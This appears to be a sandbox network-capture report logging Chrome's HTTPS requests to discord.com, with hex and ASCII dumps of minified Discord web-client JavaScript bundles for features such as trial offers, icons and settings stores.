                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2e 64 28 74 2c 7b 75 73 65 50 72 65 6d 69 75 6d 54 72 69 61 6c 4f 66 66 65 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 43 7d 7d 29 3b 76 61 72 20 6c 3d 72 28 22 36 35 35 39 37 22 29 2c 6e 3d 72 28 22 33 34 30 34 31 32 22 29 2c 69 3d 72 28 22 35 34 30 36 39 32 22 29 2c 75 3d 72 28 22 38 33 33 35 31 36 22 29 2c 73 3d 72 28 22 36 34 36 37 31 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 65 29 7b 76 61 72 20 74 2c 72 2c 43 2c 61 3b 6c 65 74 20 66 3d 28 30 2c 75 2e 75 73 65 54 72 69 61 6c 4f 66 66 65 72 29 28 73 2e 50 52 45 4d 49 55 4d 5f 54 49 45 52 5f 32 5f 54 52 49 41 4c 5f 46 4f 52 5f 45 56 45 52 59 4f 4e 45 5f 54 52 49 41 4c 5f 49 44 29 2c 5f 3d 28 30 2c 75 2e 75 73 65 54 72 69 61 6c 4f 66 66 65 72 29 28 73 2e 50 52 45 4d 49 55 4d 5f 54 49
                                                                          Data Ascii: .d(t,{usePremiumTrialOffer:function(){return C}});var l=r("65597"),n=r("340412"),i=r("540692"),u=r("833516"),s=r("646718");function C(e){var t,r,C,a;let f=(0,u.useTrialOffer)(s.PREMIUM_TIER_2_TRIAL_FOR_EVERYONE_TRIAL_ID),_=(0,u.useTrialOffer)(s.PREMIUM_TI
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 65 63 74 28 28 29 3d 3e 7b 69 66 28 6e 75 6c 6c 21 3d 74 26 26 6e 75 6c 6c 21 3d 74 2e 65 78 70 69 72 65 73 5f 61 74 29 7b 6c 65 74 20 65 3d 6e 65 77 20 69 2e 54 69 6d 65 6f 75 74 2c 6c 3d 28 29 3d 3e 7b 6c 65 74 20 6e 3d 6e 75 6c 6c 21 3d 74 2e 65 78 70 69 72 65 73 5f 61 74 3f 44 61 74 65 2e 70 61 72 73 65 28 74 2e 65 78 70 69 72 65 73 5f 61 74 29 2d 44 61 74 65 2e 6e 6f 77 28 29 3a 30 3b 6e 75 6c 6c 3d 3d 65 7c 7c 65 2e 73 74 61 72 74 28 6e 2c 28 29 3d 3e 7b 21 72 26 26 61 28 74 29 3f 66 28 21 30 29 3a 6c 28 29 7d 29 7d 3b 72 65 74 75 72 6e 20 6c 28 29 2c 28 29 3d 3e 65 2e 73 74 6f 70 28 29 7d 7d 2c 5b 72 2c 74 5d 29 2c 72 7c 7c 5f 3f 6e 75 6c 6c 3a 74 7d 7d 2c 33 34 30 34 31 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 22 75 73 65 20 73 74 72
                                                                          Data Ascii: ect(()=>{if(null!=t&&null!=t.expires_at){let e=new i.Timeout,l=()=>{let n=null!=t.expires_at?Date.parse(t.expires_at)-Date.now():0;null==e||e.start(n,()=>{!r&&a(t)?f(!0):l()})};return l(),()=>e.stop()}},[r,t]),r||_?null:t}},340412:function(e,t,r){"use str
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 28 66 2e 75 73 65 72 54 72 69 61 6c 4f 66 66 65 72 73 29 2e 66 69 6c 74 65 72 28 72 3d 3e 74 2e 69 6e 63 6c 75 64 65 73 28 72 2e 74 72 69 61 6c 5f 69 64 29 26 26 6e 75 6c 6c 21 3d 72 2e 65 78 70 69 72 65 73 5f 61 74 26 26 6e 75 6c 6c 21 3d 72 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 74 72 69 61 6c 26 26 65 2e 69 6e 63 6c 75 64 65 73 28 72 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 5f 74 72 69 61 6c 2e 73 6b 75 5f 69 64 29 26 26 44 61 74 65 2e 70 61 72 73 65 28 72 2e 65 78 70 69 72 65 73 5f 61 74 29 3c 44 61 74 65 2e 6e 6f 77 28 29 2b 43 2e 55 53 45 52 5f 50 52 45 4d 49 55 4d 5f 53 55 42 53 43 52 49 50 54 49 4f 4e 5f 54 52 49 41 4c 5f 45 58 50 49 52 45 53 5f 41 50 50 52 4f 41 43 48 49 4e 47 5f 35 5f 44 41 59 5f 54 48 52
                                                                          Data Ascii: Object.values(f.userTrialOffers).filter(r=>t.includes(r.trial_id)&&null!=r.expires_at&&null!=r.subscription_trial&&e.includes(r.subscription_trial.sku_id)&&Date.parse(r.expires_at)<Date.now()+C.USER_PREMIUM_SUBSCRIPTION_TRIAL_EXPIRES_APPROACHING_5_DAY_THR
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 47 5f 55 53 45 52 5f 4f 46 46 45 52 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 75 73 65 72 54 72 69 61 6c 4f 66 66 65 72 3a 74 2c 75 73 65 72 44 69 73 63 6f 75 6e 74 3a 72 7d 3d 65 3b 6e 75 6c 6c 3d 3d 74 26 26 6e 75 6c 6c 3d 3d 72 26 26 5f 28 29 2c 6e 75 6c 6c 21 3d 74 3f 28 66 2e 75 73 65 72 54 72 69 61 6c 4f 66 66 65 72 73 5b 74 2e 74 72 69 61 6c 5f 69 64 5d 3d 74 2c 66 2e 75 73 65 72 44 69 73 63 6f 75 6e 74 73 3d 7b 7d 29 3a 6e 75 6c 6c 21 3d 72 26 26 28 66 2e 75 73 65 72 44 69 73 63 6f 75 6e 74 73 5b 72 2e 64 69 73 63 6f 75 6e 74 5f 69 64 5d 3d 72 2c 66 2e 75 73 65 72 54 72 69 61 6c 4f 66 66 65 72 73 3d 7b 7d 29 2c 66 2e 75 73 65 72 4f 66 66 65 72 73 4c 61 73 74 46 65 74 63 68 65 64 41 74 44 61 74 65
                                                                          Data Ascii: G_USER_OFFER_FETCH_SUCCESS:function(e){let{userTrialOffer:t,userDiscount:r}=e;null==t&&null==r&&_(),null!=t?(f.userTrialOffers[t.trial_id]=t,f.userDiscounts={}):null!=r&&(f.userDiscounts[r.discount_id]=r,f.userTrialOffers={}),f.userOffersLastFetchedAtDate


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          256192.168.2.549991162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/47387.4470209d33fc5d80f673.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=x0HHaR2XrbYyd6oZjMI2mMTQT9We50P4So.cyFMvr_M-1702226711688-0-604800000
                                                                          2023-12-10 16:45:12 UTC971INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 38 35 36 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 37 64 63 61 66 31 32 37 37 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 78566Connection: closeCF-Ray: 8336f4f7dcaf1277-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC398INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 34 37 33 38 37 22 5d 2c 7b 36 30 39 37 30 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 34 61 31 36 32 30 64 61 30 38 66 30 39 38 33 31 34 32 34 31 2e 73 76 67 22 7d 2c 36 30 32 32 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 61 63 36 34 61 34 62 31 36 34 31 36 31 35 34 36 36 33 66 37 2e 73 76 67 22 7d 2c 39 33 39 37 38 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47387"],{609708:function(e,t,n){"use strict";e.exports=n.p+"4a1620da08f098314241.svg"},602291:function(e,t,n){"use strict";e.exports=n.p+"ac64a4b16416154663f7.svg"},939784:function(e,
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 31 34 34 30 35 35 32 34 65 66 33 39 39 30 36 62 64 30 36 2e 70 6e 67 22 7d 2c 34 38 31 39 32 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 37 35 61 64 35 34 66 35 37 65 62 64 38 34 62 61 62 64 66 32 2e 73 76 67 22 7d 2c 35 32 37 33 38 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 46 69 6c 65 55 70 6c 6f 61 64 49 63 6f 6e 43 6c 61 73 73 4e 61 6d 65 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 44 45 46 41 55 4c 54 5f
                                                                          Data Ascii: 8:function(e,t,n){"use strict";e.exports=n.p+"714405524ef39906bd06.png"},481927:function(e,t,n){"use strict";e.exports=n.p+"75ad54f57ebd84babdf2.svg"},527382:function(e,t,n){"use strict";n.r(t),n.d(t,{FileUploadIconClassNames:function(){return s},DEFAULT_
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 29 2c 73 3d 6e 28 22 35 35 31 30 34 32 22 29 2c 61 3d 6e 28 22 35 31 36 32 35 36 22 29 2c 6f 3d 6e 28 22 32 30 32 36 36 34 22 29 2c 75 3d 6e 28 22 34 37 36 37 36 35 22 29 2c 64 3d 6e 28 22 31 30 39 30 33 36 22 29 2c 63 3d 6e 28 22 35 32 37 33 38 32 22 29 2c 6d 3d 6e 28 22 38 33 31 38 33 39 22 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6c 65 74 7b 74 69 74 6c 65 3a 74 2c 68 65 6c 70 3a 6e 2c 73 68 6f 77 50 72 65 6d 69 75 6d 55 70 73 65 6c 6c 3a 72 2c 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 74 65 3a 73 2c 69 63 6f 6e 73 3a 66 2c 66 69 6c 65 53 69 7a 65 3a 5f 2c 6f 6e 43 6c 6f 73 65 3a 45 7d 3d 65 2c 54 3d 28 30 2c 75 2e 75 73 65 55 49 44 29 28 29 2c 49 3d 6e 75 6c 6c 21 3d 66 3f 66 3a 63 2e 44 45 46 41 55 4c 54 5f 46 49 4c 45 5f 55 50 4c 4f 41 44 5f 49
                                                                          Data Ascii: ),s=n("551042"),a=n("516256"),o=n("202664"),u=n("476765"),d=n("109036"),c=n("527382"),m=n("831839");function f(e){let{title:t,help:n,showPremiumUpsell:r,transitionState:s,icons:f,fileSize:_,onClose:E}=e,T=(0,u.useUID)(),I=null!=f?f:c.DEFAULT_FILE_UPLOAD_I
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 2d 2e 39 33 61 2e 30 35 2e 30 35 20 30 20 30 20 30 2d 2e 30 33 2d 2e 30 33 6c 2d 2e 39 33 2d 2e 33 34 61 32 2e 39 33 20 32 2e 39 33 20 30 20 30 20 31 2d 2e 35 36 2d 35 2e 32 5a 4d 36 2e 35 20 31 31 61 31 2e 35 20 31 2e 35 20 30 20 31 20 30 20 30 2d 33 20 31 2e 35 20 31 2e 35 20 30 20 30 20 30 20 30 20 33 5a 6d 39 20 33 61 31 2e 35 20 31 2e 35 20 30 20 31 20 30 20 30 2d 33 20 31 2e 35 20 31 2e 35 20 30 20 30 20 30 20 30 20 33 5a 6d 2d 32 2e 37 39 2e 35 34 63 2e 32 37 2d 2e 34 33 2e 30 32 2d 2e 39 35 2d 2e 34 33 2d 31 2e 30 39 6c 2d 34 2e 30 36 2d 31 2e 32 33 63 2d 2e 34 35 2d 2e 31 34 2d 2e 39 34 2e 31 35 2d 2e 39 36 2e 36 36 61 33 2e 30 32 20 33 2e 30 32 20 30 20 30 20 30 20 32 2e 30 35 20 33 2e 30 36 63 31 2e 32 39 2e 34 20 32 2e 36 36 2d 2e 32 31 20 33
                                                                          Data Ascii: -.93a.05.05 0 0 0-.03-.03l-.93-.34a2.93 2.93 0 0 1-.56-5.2ZM6.5 11a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm9 3a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm-2.79.54c.27-.43.02-.95-.43-1.09l-4.06-1.23c-.45-.14-.94.15-.96.66a3.02 3.02 0 0 0 2.05 3.06c1.29.4 2.66-.21 3
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 73 3f 73 3a 73 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 35 20 32 61 33 20 33 20 30 20 30 20 30 2d 33 20 33 76 31 34 61 33 20 33 20 30 20 30 20 30 20 33 20 33 68 31 34 61 33 20 33 20 30 20 30 20 30 20 33 2d 33 56 35 61 33 20 33 20 30 20 30 20 30 2d 33 2d 33 48 35 5a 6d 31 30 20 36 61 33 20 33 20 30 20 31 20 31 2d 36 20 30 20 33 20 33 20 30 20 30 20 31 20 36 20 30 5a 6d 2d 39 20 39 2e 38 33 41 35 2e 38 33 20 35 2e 38 33 20 30 20 30 20 31 20 31 31 2e 38 33 20 31 32 68 2e 33 34 41 35 2e 38 33 20 35 2e 38 33 20 30 20
                                                                          Data Ascii: iewBox:"0 0 24 24",children:(0,i.jsx)("path",{fill:"string"==typeof s?s:s.css,fillRule:"evenodd",d:"M5 2a3 3 0 0 0-3 3v14a3 3 0 0 0 3 3h14a3 3 0 0 0 3-3V5a3 3 0 0 0-3-3H5Zm10 6a3 3 0 1 1-6 0 3 3 0 0 1 6 0Zm-9 9.83A5.83 5.83 0 0 1 11.83 12h.34A5.83 5.83 0
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 74 65 72 76 61 6c 28 65 29 7d 2c 5b 74 5d 29 7d 7d 2c 33 32 35 33 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 75 70 64 61 74 65 42 61 63 6b 67 72 6f 75 6e 64 47 72 61 64 69 65 6e 74 50 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 72 65 73 65 74 42 61 63 6b 67 72 6f 75 6e 64 47 72 61 64 69 65 6e 74 50 72 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 2c 6f 70 65 6e 45 64 69 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 63 6c 6f 73 65 45 64 69 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 72 65 73 65 74 50 72 65 76 69 65 77 43 6c 69 65 6e 74 54 68
                                                                          Data Ascii: terval(e)},[t])}},32531:function(e,t,n){"use strict";n.r(t),n.d(t,{updateBackgroundGradientPreset:function(){return r},resetBackgroundGradientPreset:function(){return l},openEditor:function(){return s},closeEditor:function(){return a},resetPreviewClientTh
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 28 65 29 7b 76 61 72 20 74 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 74 3d 49 5b 65 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 69 73 46 65 74 63 68 69 6e 67 7d 73 68 6f 75 6c 64 46 65 74 63 68 53 65 74 74 69 6e 67 73 28 65 29 7b 76 61 72 20 74 2c 6e 3b 6c 65 74 20 69 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 49 5b 65 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 7b 69 73 46 65 74 63 68 69 6e 67 3a 21 31 7d 2c 72 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6c 3d 72 2d 28 6e 75 6c 6c 21 3d 3d 28 6e 3d 69 2e 6c 61 73 74 46 65 74 63 68 54 69 6d 65 73 74 61 6d 70 4d 73 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 30 29 3e 33 36 65 35 3b 72 65 74 75 72 6e 21 28 6e 75 6c 6c 3d 3d 69 3f 76 6f 69 64 20 30 3a 69 2e 69 73 46 65 74 63 68 69
                                                                          Data Ascii: (e){var t;return null===(t=I[e])||void 0===t?void 0:t.isFetching}shouldFetchSettings(e){var t,n;let i=null!==(t=I[e])&&void 0!==t?t:{isFetching:!1},r=Date.now(),l=r-(null!==(n=i.lastFetchTimestampMs)&&void 0!==n?n:0)>36e5;return!(null==i?void 0:i.isFetchi
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 3d 21 31 2c 66 3d 65 2e 65 72 72 6f 72 73 7d 2c 43 4c 59 44 45 5f 52 45 53 45 54 5f 50 45 4e 44 49 4e 47 5f 43 48 41 4e 47 45 53 3a 50 2c 43 4c 59 44 45 5f 50 52 4f 46 49 4c 45 5f 46 45 54 43 48 5f 53 54 41 52 54 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 63 6c 79 64 65 50 72 6f 66 69 6c 65 49 64 3a 74 7d 3d 65 2c 6e 3d 45 5b 74 5d 3b 45 5b 74 5d 3d 7b 69 73 46 65 74 63 68 69 6e 67 3a 21 30 2c 6c 61 73 74 46 65 74 63 68 54 69 6d 65 73 74 61 6d 70 4d 73 3a 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 6c 61 73 74 46 65 74 63 68 54 69 6d 65 73 74 61 6d 70 4d 73 7d 7d 2c 43 4c 59 44 45 5f 50 52 4f 46 49 4c 45 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 7b 70
                                                                          Data Ascii: :function(e){c=!1,f=e.errors},CLYDE_RESET_PENDING_CHANGES:P,CLYDE_PROFILE_FETCH_START:function(e){let{clydeProfileId:t}=e,n=E[t];E[t]={isFetching:!0,lastFetchTimestampMs:null==n?void 0:n.lastFetchTimestampMs}},CLYDE_PROFILE_FETCH_SUCCESS:function(e){let{p
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 72 3d 6e 28 22 39 31 33 31 34 34 22 29 3b 6c 65 74 20 6c 3d 7b 66 65 74 63 68 65 64 3a 21 31 2c 61 66 66 69 6e 69 74 69 65 73 3a 5b 5d 7d 3b 63 6c 61 73 73 20 73 20 65 78 74 65 6e 64 73 20 69 2e 64 65 66 61 75 6c 74 2e 53 74 6f 72 65 7b 67 65 74 20 68 61 73 46 65 74 63 68 65 64 28 29 7b 72 65 74 75 72 6e 20 6c 2e 66 65 74 63 68 65 64 7d 67 65 74 20 61 66 66 69 6e 69 74 69 65 73 28 29 7b 72 65 74 75 72 6e 20 6c 2e 61 66 66 69 6e 69 74 69 65 73 7d 7d 76 61 72 20 61 3d 6e 65 77 20 73 28 72 2e 64 65 66 61 75 6c 74 2c 7b 42 49 4c 4c 49 4e 47 5f 4e 49 54 52 4f 5f 41 46 46 49 4e 49 54 59 5f 46 45 54 43 48 45 44 3a 66 75 6e 63
                                                                          Data Ascii: ault:function(){return a}});var i=n("446674"),r=n("913144");let l={fetched:!1,affinities:[]};class s extends i.default.Store{get hasFetched(){return l.fetched}get affinities(){return l.affinities}}var a=new s(r.default,{BILLING_NITRO_AFFINITY_FETCHED:func


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          257192.168.2.549992162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:12 UTC866OUTGET /assets/27057.ee8f9d6f6f76cab31011.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Pvcmd6a6.0o4HjOJPmeojkgEm6NiaF1BbolJHbj9VMY-1702226711747-0-604800000
                                                                          2023-12-10 16:45:12 UTC975INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 35 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 37 64 63 34 39 64 39 64 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:12 GMTContent-Type: application/javascriptContent-Length: 12509Connection: closeCF-Ray: 8336f4f7dc49d9dd-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:12 UTC394INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 37 30 35 37 22 5d 2c 7b 39 30 36 30 36 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 65 29 2c 6c 2e 64 28 65 2c 7b 52 65 61 63 74 69 6f 6e 49 63 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 76 61 72 20 6e 3d 6c 28 22 33 37 39 38 33 22 29 3b 6c 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 61 3d 6c 28 22 36 36 39 34 39 31 22 29 2c 72 3d 6c 28 22 37 35 31 39 36 22 29 3b 6c 65 74 20 69 3d 74 3d 3e 7b 6c 65 74 7b 77 69 64 74 68 3a 65 3d 32 34 2c 68 65 69
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["27057"],{906069:function(t,e,l){"use strict";l.r(e),l.d(e,{ReactionIcon:function(){return i}});var n=l("37983");l("884691");var a=l("669491"),r=l("75196");let i=t=>{let{width:e=24,hei
                                                                          2023-12-10 16:45:12 UTC1369INData Raw: 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 6c 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 32 20 32 33 61 31 31 20 31 31 20 30 20 31 20 30 20 30 2d 32 32 20 31 31 20 31 31 20 30 20 30 20 30 20 30 20 32 32 5a 4d 36 2e 35 20 31 33 61 31 2e 35 20 31 2e 35 20 30 20 31 20 30 20 30 2d 33 20 31 2e 35 20 31 2e 35 20 30 20 30 20 30 20 30 20 33 5a 6d 31 31 20 30 61 31 2e 35 20 31 2e 35 20 30 20 31 20 30 20 30 2d 33 20
                                                                          Data Ascii: 3.org/2000/svg",width:e,height:l,fill:"none",viewBox:"0 0 24 24",children:(0,n.jsx)("path",{fill:"string"==typeof i?i:i.css,fillRule:"evenodd",d:"M12 23a11 11 0 1 0 0-22 11 11 0 0 0 0 22ZM6.5 13a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm11 0a1.5 1.5 0 1 0 0-3
